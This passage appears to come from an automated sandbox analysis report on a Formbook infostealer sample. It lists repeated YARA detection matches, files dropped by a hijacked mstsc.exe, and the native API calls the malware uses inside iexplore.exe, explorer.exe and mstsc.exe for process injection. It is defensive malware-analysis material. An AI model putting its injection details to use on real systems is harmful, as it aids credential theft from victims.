          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: C:\Windows\SysWOW64\mstsc.exe Dropped file: C:\Users\user\AppData\Roaming\260P27U-\260logri.ini
          Source: C:\Windows\SysWOW64\mstsc.exe Dropped file: C:\Users\user\AppData\Roaming\260P27U-\260logrv.ini
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: iexplore.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: mstsc.exe PID: 7840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A350 NtCreateFile,1_2_0041A350
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A400 NtReadFile,1_2_0041A400
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A480 NtClose,1_2_0041A480
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0041A47C NtClose,1_2_0041A47C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2B60 NtClose,LdrInitializeThunk,1_2_036F2B60
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2AD0 NtReadFile,LdrInitializeThunk,1_2_036F2AD0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2F30 NtCreateSection,LdrInitializeThunk,1_2_036F2F30
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2FE0 NtCreateFile,LdrInitializeThunk,1_2_036F2FE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2FB0 NtResumeThread,LdrInitializeThunk,1_2_036F2FB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_036F2EA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_036F2E80
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_036F2D30
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2D10 NtMapViewOfSection,LdrInitializeThunk,1_2_036F2D10
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_036F2DF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2DD0 NtDelayExecution,LdrInitializeThunk,1_2_036F2DD0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_036F2C70
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F4340 NtSetContextThread,1_2_036F4340
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3010 NtOpenDirectoryObject,1_2_036F3010
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3090 NtSetValueKey,1_2_036F3090
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F4650 NtSuspendThread,1_2_036F4650
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F35C0 NtCreateMutant,1_2_036F35C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2BE0 NtQueryValueKey,1_2_036F2BE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2BF0 NtAllocateVirtualMemory,1_2_036F2BF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2BA0 NtEnumerateValueKey,1_2_036F2BA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2B80 NtQueryInformationFile,1_2_036F2B80
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2AF0 NtWriteFile,1_2_036F2AF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2AB0 NtWaitForSingleObject,1_2_036F2AB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F39B0 NtGetContextThread,1_2_036F39B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2F60 NtCreateProcessEx,1_2_036F2F60
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2FA0 NtQuerySection,1_2_036F2FA0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2F90 NtProtectVirtualMemory,1_2_036F2F90
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2E30 NtWriteVirtualMemory,1_2_036F2E30
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2EE0 NtQueueApcThread,1_2_036F2EE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3D70 NtOpenThread,1_2_036F3D70
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2D00 NtSetInformationFile,1_2_036F2D00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F3D10 NtOpenProcessToken,1_2_036F3D10
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2DB0 NtEnumerateKey,1_2_036F2DB0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2C60 NtCreateKey,1_2_036F2C60
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2C00 NtQueryInformationProcess,1_2_036F2C00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2CF0 NtOpenProcess,1_2_036F2CF0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2CC0 NtQueryVirtualMemory,1_2_036F2CC0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2CA0 NtQueryInformationToken,1_2_036F2CA0
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAE232 NtCreateFile,NtReadFile,5_2_0FAAE232
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAFE12 NtProtectVirtualMemory,5_2_0FAAFE12
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAFE0A NtProtectVirtualMemory,5_2_0FAAFE0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C35C0 NtCreateMutant,LdrInitializeThunk,6_2_051C35C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C4650 NtSuspendThread,LdrInitializeThunk,6_2_051C4650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C3090 NtSetValueKey,LdrInitializeThunk,6_2_051C3090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C4340 NtSetContextThread,LdrInitializeThunk,6_2_051C4340
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_051C2D10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2D00 NtSetInformationFile,LdrInitializeThunk,6_2_051C2D00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_051C2D30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2DD0 NtDelayExecution,LdrInitializeThunk,6_2_051C2DD0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_051C2DF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_051C2C70
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2C60 NtCreateKey,LdrInitializeThunk,6_2_051C2C60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_051C2CA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2F30 NtCreateSection,LdrInitializeThunk,6_2_051C2F30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2FB0 NtResumeThread,LdrInitializeThunk,6_2_051C2FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2FE0 NtCreateFile,LdrInitializeThunk,6_2_051C2FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_051C2E80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_051C2EA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_051C2EE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C39B0 NtGetContextThread,LdrInitializeThunk,6_2_051C39B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2B60 NtClose,LdrInitializeThunk,6_2_051C2B60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_051C2BA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_051C2BF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_051C2BE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2AD0 NtReadFile,LdrInitializeThunk,6_2_051C2AD0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C2AF0 NtWriteFile,LdrInitializeThunk,6_2_051C2AF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C3010 NtOpenDirectoryObject,6_2_051C3010
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D2E901_2_036D2E90
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03777D731_2_03777D73
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C3D401_2_036C3D40
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03771D5A1_2_03771D5A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CAD001_2_036CAD00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BADE01_2_036BADE0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DFDC01_2_036DFDC0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D8DBF1_2_036D8DBF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03739C321_2_03739C32
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0C001_2_036C0C00
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377FCF21_2_0377FCF2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B0CF21_2_036B0CF2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03760CB51_2_03760CB5
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90C2325_2_0E90C232
          Source: C:\Windows\explorer.exeCode function: 5_2_0E906B305_2_0E906B30
          Source: C:\Windows\explorer.exeCode function: 5_2_0E906B325_2_0E906B32
          Source: C:\Windows\explorer.exeCode function: 5_2_0E9020825_2_0E902082
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90B0365_2_0E90B036
          Source: C:\Windows\explorer.exeCode function: 5_2_0E90F5CD5_2_0E90F5CD
          Source: C:\Windows\explorer.exeCode function: 5_2_0E9099125_2_0E909912
          Source: C:\Windows\explorer.exeCode function: 5_2_0E903D025_2_0E903D02
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAE2325_2_0FAAE232
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAB15CD5_2_0FAB15CD
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA8B325_2_0FAA8B32
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA8B305_2_0FAA8B30
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA5D025_2_0FAA5D02
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAB9125_2_0FAAB912
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAA40825_2_0FAA4082
          Source: C:\Windows\explorer.exeCode function: 5_2_0FAAD0365_2_0FAAD036
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003B10A06_2_003B10A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003360E06_2_003360E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0038E2506_2_0038E250
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003614286_2_00361428
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0035C6506_2_0035C650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0038B8B66_2_0038B8B6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003B18E06_2_003B18E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00342AA76_2_00342AA7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00330AC36_2_00330AC3
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00356D106_2_00356D10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00417F3A6_2_00417F3A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00328FC16_2_00328FC1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051905356_2_05190535
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052475716_2_05247571
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0522D5B06_2_0522D5B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052505916_2_05250591
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524F43F6_2_0524F43F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052424466_2_05242446
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051814606_2_05181460
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0523E4F66_2_0523E4F6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051B47506_2_051B4750
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051907706_2_05190770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524F7B06_2_0524F7B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0518C7C06_2_0518C7C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052416CC6_2_052416CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051AC6E06_2_051AC6E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051801006_2_05180100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0522A1186_2_0522A118
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0525B16B6_2_0525B16B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0517F1726_2_0517F172
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051C516C6_2_051C516C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052181586_2_05218158
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052501AA6_2_052501AA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0519B1B06_2_0519B1B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052481CC6_2_052481CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524F0E06_2_0524F0E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052470E96_2_052470E9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051970C06_2_051970C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0523F0CC6_2_0523F0CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524132D6_2_0524132D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0517D34C6_2_0517D34C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0524A3526_2_0524A352
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_051D739A6_2_051D739A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052503E66_2_052503E6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0519E3F06_2_0519E3F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_052302746_2_05230274
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0032AE27 appears 37 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0517B970 appears 99 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00413E7C appears 202 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 051D7E54 appears 40 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0037E06D appears 31 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 00328010 appears 1004 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0520F290 appears 41 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 051FEA12 appears 51 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 0372EA12 appears 86 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 0373F290 appears 103 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 03707E54 appears 93 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 036F5130 appears 36 times
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 036AB970 appears 250 times
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe Static PE information: invalid certificate
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe Static PE information: No import functions for PE file found
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903726120.0000021CCE5E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNativeMethods.dll" vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000000.1702261701.0000021CCE102000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNativeMethods.dll" vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000000.1702261701.0000021CCE102000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIzemuxaqiqawivuloD vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904035530.0000021CCFE70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAhijeyotexewobusiz0 vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe Binary or memory string: OriginalFilenameNativeMethods.dll" vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
